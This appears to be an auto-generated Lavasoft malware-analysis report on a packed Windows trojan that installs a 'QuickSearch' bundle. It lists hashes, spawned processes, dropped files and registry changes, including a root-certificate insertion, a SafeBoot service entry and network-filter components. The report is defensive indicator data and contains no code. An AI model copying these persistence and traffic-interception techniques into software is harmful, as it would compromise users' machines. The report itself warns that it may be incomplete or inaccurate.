Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 2b140f9d8cd365bf8522a5118d0b06ef
SHA1: 500604921e29e49301d1971a684e38791997b52f
SHA256: dd09ed45b658c0e639bb45198d9e9793797ac90a0203b35c323490ee476879c7
SSDeep: 1536:6pgpHzb9dZVX9fHMvG0D3XJcMsA84TbE/ rN5hsak32SDO:4gXdZt9P6D3XJcMle r9/SDO
Size: 57392 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
zcengine.exe:1284
zcengine.exe:1208
zcengine.exe:684
sc.exe:536
sc.exe:1632
poz.exe:2584
SchTasks.exe:2660
%original file name%.exe:944
setupfs_1123.exe:1940
zengine.exe:2036
zengine.exe:1968
The Trojan injects its code into the following process(es): no code injection was observed.
Mutexes
The following mutexes were created/opened: no objects were found.
File activity
The process zcengine.exe:1284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\zcengine.log (434 bytes)
The process zcengine.exe:1208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\zcengine.log (83902 bytes)
%WinDir%\Temp\CertsIE.dat (12284 bytes)
%System%\zcengineOff.ini (784 bytes)
%System%\zcengine.ini (872 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\CertsIE.dat (0 bytes)
The process zcengine.exe:684 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\zcengine.log (759 bytes)
The process %original file name%.exe:944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\I9SFMNGD\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\setupfs_1123.exe (332214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01M9AVQ1\setupfs_4435[1].exe (332214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JMRO554\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\UAC.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01M9AVQ1\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SVMBSZ6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\ns3.tmp (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1.tmp (0 bytes)
C:\setupfs_1123.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\ns3.tmp (0 bytes)
The process setupfs_1123.exe:1940 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\QuickSearch\zcinstaller.exe (5896 bytes)
%Program Files%\QuickSearch\uninstall.exe (1793 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsE.tmp (6 bytes)
%Program Files%\QuickSearch\AZDLL64.exe (3704 bytes)
%Program Files%\QuickSearch\zcengine.dll (9984 bytes)
%Program Files%\QuickSearch\zcwfp64.sys (1552 bytes)
%Program Files%\QuickSearch\spw3016.exe (1856 bytes)
%Program Files%\QuickSearch\slite.exe (16288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\GetVersion.dll (6 bytes)
%Program Files%\QuickSearch\nssutil3.dll (5064 bytes)
%Program Files%\QuickSearch\ssl3.dll (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns8.tmp (6 bytes)
%Program Files%\QuickSearch\out.txt (52 bytes)
%Program Files%\QuickSearch\libnspr4.dll (11048 bytes)
C:\END (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsC.tmp (6 bytes)
%Program Files%\QuickSearch\libplds4.dll (1552 bytes)
%Program Files%\QuickSearch\softokn3.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\inetc.dll (784 bytes)
%Program Files%\QuickSearch\poz.exe (4080 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\pwgen.dll (784 bytes)
%Program Files%\QuickSearch\zcengine64.dll (11728 bytes)
%Program Files%\QuickSearch\zengine64.exe (9664 bytes)
%Program Files%\QuickSearch\zcwfp.sys (1552 bytes)
%Program Files%\QuickSearch\zengine.ini (116 bytes)
%Program Files%\QuickSearch\nssckbi.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsD.tmp (6 bytes)
%Program Files%\QuickSearch\zcengine.tlb (1856 bytes)
%Program Files%\QuickSearch\zengine.exe (17395 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsExec.dll (6 bytes)
%Program Files%\QuickSearch\freebl3.dll (11152 bytes)
%Program Files%\QuickSearch\smime3.dll (5064 bytes)
%Program Files%\QuickSearch\AZDLL64.dll (5184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (235157 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsProcess.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsA.tmp (6 bytes)
%Program Files%\QuickSearch\libplc4.dll (1552 bytes)
%Program Files%\QuickSearch\zcenginecert.dll (6056 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\I9SFMNGD\ext[1].htm (2 bytes)
%Program Files%\QuickSearch\sqlite3.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns9.tmp (6 bytes)
%Program Files%\QuickSearch\nss3.dll (29256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsB.tmp (6 bytes)
%Program Files%\QuickSearch\zcengine.exe (72529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)
%Program Files%\QuickSearch\nssdbm3.dll (6360 bytes)
%Program Files%\QuickSearch\AZDLL.dll (3744 bytes)
The Trojan deletes the following file(s):
%Program Files%\QuickSearch\0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns8.tmp (0 bytes)
%Program Files%\QuickSearch\poz.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\pwgen.dll (0 bytes)
%Program Files%\QuickSearch\out.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\GetVersion.dll (0 bytes)
The process zengine.exe:2036 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\lengine.ini.log (895 bytes)
The process zengine.exe:1968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\zcengine.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lengine.ini.log (11803 bytes)
Registry activity
The process zcengine.exe:1284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 AE F5 45 0D A5 CB 8C 66 38 B8 4E FA CA 4C 21"
The process zcengine.exe:1208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 90 B3 E6 8E 9A 26 02 B4 D6 06 4B 42 4F A5 6F"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6A6D0BE08DB130A0C56954B3C6E49ABC012AD569]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 6A 6D 0B E0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"6A6D0BE08DB130A0C56954B3C6E49ABC012AD569"
The process zcengine.exe:684 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\zcengineLib.DataTable.1\CLSID]
"(Default)" = "{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}"
[HKCR\CLSID\{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\CLSID\{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\zcengineLib.DataTableFields.1]
"(Default)" = "DataTableFields Class"
[HKCR\Interface\{83E07061-02D1-41EC-8751-BB176B823C38}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{3F8D3B31-AEB8-4ED7-8B05-5556068D6B54}]
"(Default)" = "IReadOnlyManager"
[HKCR\Interface\{3F8D3B31-AEB8-4ED7-8B05-5556068D6B54}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\zcengineLib.ReadOnlyManager\CurVer]
"(Default)" = "zcengineLib.ReadOnlyManager.1"
[HKCR\CLSID\{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}]
"(Default)" = "DataTable Class"
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network\zcengine]
"(Default)" = "service"
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"LocalService" = "zcengine"
[HKCR\Interface\{F7971E81-FC71-4659-8CCE-C903576E0924}]
"(Default)" = "IDataTable"
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"kp1" = "0"
[HKCR\CLSID\{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}]
"(Default)" = "DataTableFields Class"
[HKCR\zcengineLib.ReadOnlyManager.1]
"(Default)" = "ReadOnlyManager Class"
[HKCR\CLSID\{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{A471A4AA-5C18-429F-81BF-6C760941DB74}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{F2FB003D-07C7-4E4D-80E3-00B49468A6F4}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\zcengineLib.LSPLogic\CLSID]
"(Default)" = "{4D4D0357-0376-4656-A040-65AC089E84A2}"
[HKCR\Interface\{6ED1EF08-DFF4-4252-8986-691D06C54131}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.LSPLogic\CurVer]
"(Default)" = "zcengineLib.LSPLogic.1"
[HKCR\Interface\{F7971E81-FC71-4659-8CCE-C903576E0924}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{029AF757-A988-4BDD-A744-A4C7BCEBB011}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}]
"(Default)" = "DataContainer Class"
[HKCR\Interface\{074DCA49-F6A1-417F-B79E-D5E3ADC30330}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{F2FB003D-07C7-4E4D-80E3-00B49468A6F4}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{024BF4C8-B53D-45B9-957F-D3BA9655FF39}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{9F0948E7-227A-4F1B-9849-2D8912F185A7}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\zcengineLib.LSPLogic]
"(Default)" = "LSPLogic Class"
[HKCR\Interface\{389562C4-59D9-40C4-966E-28DA91725FFE}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}\ProgID]
"(Default)" = "zcengineLib.DataTableFields.1"
[HKCR\Interface\{389562C4-59D9-40C4-966E-28DA91725FFE}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{074DCA49-F6A1-417F-B79E-D5E3ADC30330}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{C0A7C2B3-86D6-42AF-8221-79C9E4AD50BA}\TypeLib]
"Version" = "1.0"
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"ServiceParameters" = "-Service"
[HKCR\Interface\{F2FB003D-07C7-4E4D-80E3-00B49468A6F4}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{074DCA49-F6A1-417F-B79E-D5E3ADC30330}\TypeLib]
"Version" = "1.0"
[HKCR\zcengineLib.WFPController.1\CLSID]
"(Default)" = "{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}"
[HKCR\zcengineLib.WFPController]
"(Default)" = "WFPController Class"
[HKCR\zcengineLib.WFPController.1]
"(Default)" = "WFPController Class"
[HKCR\CLSID\{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
"(Default)" = "DataTableHolder Class"
[HKCR\Interface\{6ED1EF08-DFF4-4252-8986-691D06C54131}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}\ProgID]
"(Default)" = "zcengineLib.DataContainer.1"
[HKCR\Interface\{00E3D575-A24C-4BBC-A708-BCDB8BBCA6C7}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\TypeLib\{029AF757-A988-4BDD-A744-A4C7BCEBB011}\1.0\HELPDIR]
"(Default)" = "%Program Files%\QuickSearch"
[HKCR\zcengineLib.DataContainer.1\CLSID]
"(Default)" = "{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}"
[HKCR\zcengineLib.DataController\CurVer]
"(Default)" = "zcengineLib.DataController.1"
[HKCR\zcengineLib.DataContainer]
"(Default)" = "DataContainer Class"
[HKCR\Interface\{83E07061-02D1-41EC-8751-BB176B823C38}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}\VersionIndependentProgID]
"(Default)" = "zcengineLib.DataController"
[HKCR\Interface\{3323765B-5B83-4406-841E-473DBA4B8F29}]
"(Default)" = "IParentalControl"
[HKCR\CLSID\{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\Interface\{9F0948E7-227A-4F1B-9849-2D8912F185A7}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{4D4D0357-0376-4656-A040-65AC089E84A2}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\zcengineLib.ReadOnlyManager]
"(Default)" = "ReadOnlyManager Class"
[HKCR\CLSID\{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}\VersionIndependentProgID]
"(Default)" = "zcengineLib.DataContainer"
[HKCR\CLSID\{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\CLSID\{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.DataTableHolder\CurVer]
"(Default)" = "zcengineLib.DataTableHolder.1"
[HKCR\zcengineLib.LSPLogic.1\CLSID]
"(Default)" = "{4D4D0357-0376-4656-A040-65AC089E84A2}"
[HKCR\Interface\{389562C4-59D9-40C4-966E-28DA91725FFE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{9F0948E7-227A-4F1B-9849-2D8912F185A7}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{6ED1EF08-DFF4-4252-8986-691D06C54131}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{074DCA49-F6A1-417F-B79E-D5E3ADC30330}]
"(Default)" = "IParentalControlController"
[HKCR\CLSID\{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\Interface\{024BF4C8-B53D-45B9-957F-D3BA9655FF39}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{A471A4AA-5C18-429F-81BF-6C760941DB74}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}\ProgID]
"(Default)" = "zcengineLib.DataTableHolder.1"
[HKCR\CLSID\{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\Interface\{00E3D575-A24C-4BBC-A708-BCDB8BBCA6C7}]
"(Default)" = "IDataStatistics"
[HKCR\Interface\{F7971E81-FC71-4659-8CCE-C903576E0924}\TypeLib]
"Version" = "1.0"
[HKCR\zcengineLib.ReadOnlyManager\CLSID]
"(Default)" = "{F1BC674D-15D8-46C5-AC51-12AB16D67616}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 72 5F 2A 23 46 C2 F6 E8 A6 41 79 16 3D 5A DF"
[HKCR\Interface\{C0A7C2B3-86D6-42AF-8221-79C9E4AD50BA}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{F7971E81-FC71-4659-8CCE-C903576E0924}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{4D4D0357-0376-4656-A040-65AC089E84A2}]
"(Default)" = "LSPLogic Class"
[HKCR\AppID\zcengine.EXE]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\zcengineLib.DataTable.1]
"(Default)" = "DataTable Class"
[HKCR\zcengineLib.DataContainer\CLSID]
"(Default)" = "{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}"
[HKCR\CLSID\{4D4D0357-0376-4656-A040-65AC089E84A2}\ProgID]
"(Default)" = "zcengineLib.LSPLogic.1"
[HKCR\Interface\{C0A7C2B3-86D6-42AF-8221-79C9E4AD50BA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{00E3D575-A24C-4BBC-A708-BCDB8BBCA6C7}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{3F8D3B31-AEB8-4ED7-8B05-5556068D6B54}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{C0A7C2B3-86D6-42AF-8221-79C9E4AD50BA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\zcengineLib.DataTableFields]
"(Default)" = "DataTableFields Class"
[HKCR\zcengineLib.DataController]
"(Default)" = "DataController Class"
[HKCR\Interface\{389562C4-59D9-40C4-966E-28DA91725FFE}]
"(Default)" = "IDataTableFields"
[HKCR\CLSID\{4D4D0357-0376-4656-A040-65AC089E84A2}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\Interface\{00E3D575-A24C-4BBC-A708-BCDB8BBCA6C7}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\zcengineLib.DataTableHolder\CLSID]
"(Default)" = "{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}"
[HKCR\Interface\{3323765B-5B83-4406-841E-473DBA4B8F29}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{3323765B-5B83-4406-841E-473DBA4B8F29}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{4D4D0357-0376-4656-A040-65AC089E84A2}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\CLSID\{F1BC674D-15D8-46C5-AC51-12AB16D67616}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\zcengineLib.ReadOnlyManager.1\CLSID]
"(Default)" = "{F1BC674D-15D8-46C5-AC51-12AB16D67616}"
[HKCR\Interface\{3323765B-5B83-4406-841E-473DBA4B8F29}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{F1BC674D-15D8-46C5-AC51-12AB16D67616}\ProgID]
"(Default)" = "zcengineLib.ReadOnlyManager.1"
[HKCR\Interface\{6ED1EF08-DFF4-4252-8986-691D06C54131}]
"(Default)" = "IWatchDog"
[HKCR\zcengineLib.WFPController\CLSID]
"(Default)" = "{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}"
[HKCR\CLSID\{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.DataController.1\CLSID]
"(Default)" = "{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}"
[HKCR\Interface\{F7971E81-FC71-4659-8CCE-C903576E0924}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.DataContainer.1]
"(Default)" = "DataContainer Class"
[HKCR\Interface\{C0A7C2B3-86D6-42AF-8221-79C9E4AD50BA}]
"(Default)" = "IDataContainer"
[HKCR\Interface\{3F8D3B31-AEB8-4ED7-8B05-5556068D6B54}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"InstallingUser" = "eABwADkAXABhAGQAbQAAAA=="
[HKCR\CLSID\{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\CLSID\{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\Interface\{024BF4C8-B53D-45B9-957F-D3BA9655FF39}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}]
"(Default)" = "WFPController Class"
[HKCR\Interface\{00E3D575-A24C-4BBC-A708-BCDB8BBCA6C7}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{83E07061-02D1-41EC-8751-BB176B823C38}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\zcengineLib.DataTableHolder.1\CLSID]
"(Default)" = "{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}"
[HKCR\zcengineLib.DataTableFields.1\CLSID]
"(Default)" = "{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}"
[HKCR\CLSID\{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}\VersionIndependentProgID]
"(Default)" = "zcengineLib.DataTableHolder"
[HKCR\TypeLib\{029AF757-A988-4BDD-A744-A4C7BCEBB011}\1.0]
"(Default)" = "acengine 1.0 Type Library"
[HKCR\CLSID\{9ECCDEFC-1C26-4BB3-B6DF-252672D9FFFA}\LocalServer32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.exe"
[HKCR\zcengineLib.DataTableFields\CurVer]
"(Default)" = "zcengineLib.DataTableFields.1"
[HKCR\CLSID\{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}\ProgID]
"(Default)" = "zcengineLib.DataController.1"
[HKCR\Interface\{074DCA49-F6A1-417F-B79E-D5E3ADC30330}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\Interface\{A471A4AA-5C18-429F-81BF-6C760941DB74}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.DataTable\CurVer]
"(Default)" = "zcengineLib.DataTable.1"
[HKCR\zcengineLib.LSPLogic.1]
"(Default)" = "LSPLogic Class"
[HKCR\zcengineLib.DataTable\CLSID]
"(Default)" = "{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}"
[HKCR\zcengineLib.DataTableFields\CLSID]
"(Default)" = "{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}"
[HKCR\Interface\{024BF4C8-B53D-45B9-957F-D3BA9655FF39}]
"(Default)" = "ISSHController"
[HKCR\Interface\{6ED1EF08-DFF4-4252-8986-691D06C54131}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{024BF4C8-B53D-45B9-957F-D3BA9655FF39}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{F1BC674D-15D8-46C5-AC51-12AB16D67616}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\CLSID\{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}\ProgID]
"(Default)" = "zcengineLib.WFPController.1"
[HKCR\CLSID\{3A8E009B-E66D-4016-87CF-EC57FA9A4BC1}\VersionIndependentProgID]
"(Default)" = "zcengineLib.WFPController"
[HKCR\Interface\{A471A4AA-5C18-429F-81BF-6C760941DB74}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{4D4D0357-0376-4656-A040-65AC089E84A2}\VersionIndependentProgID]
"(Default)" = "zcengineLib.LSPLogic"
[HKCR\CLSID\{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}]
"(Default)" = "DataController Class"
[HKCR\Interface\{F2FB003D-07C7-4E4D-80E3-00B49468A6F4}]
"(Default)" = "IWFPController"
[HKCR\Interface\{9F0948E7-227A-4F1B-9849-2D8912F185A7}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\CLSID\{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}\ProgID]
"(Default)" = "zcengineLib.DataTable.1"
[HKCR\Interface\{3323765B-5B83-4406-841E-473DBA4B8F29}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"(Default)" = "zcengine"
[HKCR\zcengineLib.DataContainer\CurVer]
"(Default)" = "zcengineLib.DataContainer.1"
[HKCR\zcengineLib.DataTableHolder]
"(Default)" = "DataTableHolder Class"
